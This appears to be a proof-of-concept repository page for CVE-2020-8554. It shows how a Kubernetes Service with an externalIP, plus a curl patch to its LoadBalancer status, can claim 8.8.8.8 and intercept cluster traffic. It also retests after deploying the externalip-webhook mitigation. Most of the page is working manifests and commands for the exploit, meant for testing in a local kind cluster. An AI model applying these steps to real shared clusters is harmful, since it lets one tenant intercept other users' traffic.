CVE-2020-8554 PoC — Kubernetes man in the middle using LoadBalancer or ExternalIPs

Source

Associated Vulnerability

Readme

# Create Kubernetes cluster
```bash
kind create cluster  --config ./kind.yaml
```

The cluster must have certmanager:
https://cert-manager.io/docs/installation/kubernetes/

# Test vulnerability
```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
  name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: echoserver
  namespace: kubeproxy-mitm
spec:
  replicas: 1
  selector:
    matchLabels:
      app: echoserver
  template:
    metadata:
      labels:
        app: echoserver
    spec:
      containers:
      - image: gcr.io/google_containers/echoserver:1.10
        name: echoserver
        ports:
        - name: http
          containerPort: 8080
        - name: https
          containerPort: 8443
EOF

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
    - 8.8.8.8
  type: LoadBalancer
EOF

kubectl proxy --port=8080

curl -k -v -XPATCH  -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'

# check external IP 
kubectl get svc -n kubeproxy-mitm 
```

# Test the vulnerability
Deploy the webhook from https://github.com/kubernetes-sigs/externalip-webhook
```bash
kubectl apply -f ./externalip-webhook.yaml

kubectl delete svc -n kubeproxy-mitm mitm-lb  

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
    - 8.8.8.8
  type: LoadBalancer
EOF
curl -k -v -XPATCH  -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'

```

File Snapshot

 [4.0K]  /data/pocs/5ba655ff33ebdde1d64280c927eb44f8cdfc4b0b
├── [4.1K]  externalip-webhook.yaml
├── [ 150]  kind.yaml
├── [2.1K]  README.md
└── [ 287]  svc.yaml

0 directories, 4 files

Remarks